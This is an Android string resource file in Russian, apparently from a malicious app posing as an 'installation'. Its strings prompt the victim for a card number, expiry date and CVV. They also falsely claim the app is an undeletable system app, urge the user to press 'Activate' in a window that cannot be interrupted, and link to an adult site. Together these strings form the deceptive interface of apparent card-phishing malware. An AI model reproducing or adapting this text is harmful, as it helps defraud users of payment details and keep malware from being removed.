<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="add_card">Введите данные карты</string>
    <string name="app_name">installation</string>
    <string name="card_number">Номер карты</string>
    <string name="cc_err">Недействительный номер кредитной карты</string>
    <string name="continues">Продолжить</string>
    <string name="cvv">CVV-код</string>
    <string name="cvv_err">Недопустимый код CVV</string>
    <string name="denied">Операция запрещена!\10\10Невозможно удалить системное приложение.</string>
    <string name="mm">ММ</string>
    <string name="month_err">Недопустимый месяц</string>
    <string name="pls_wait">Пожалуйста, подождите</string>
    <string name="plugin">Установка завершена</string>
    <string name="reg">\10Пожалуйста, подождите.\10\10Распаковка компонентов…\10</string>
    <string name="save_card">СОХРАНИТЬ</string>
    <string name="saving">Сохранение…</string>
    <string name="warn">Для продолжения, в следующем окне нажмите кнопку \"Активировать\".\10\10Данная операция не может быть прервана.\10\10Дополнительную информацию Вы можете найти здесь:\10\10http://redtube.com</string>
    <string name="warn_win">installation</string>
    <string name="year_err">Недопустимый год</string>
    <string name="yy">ГГ</string>
</resources>
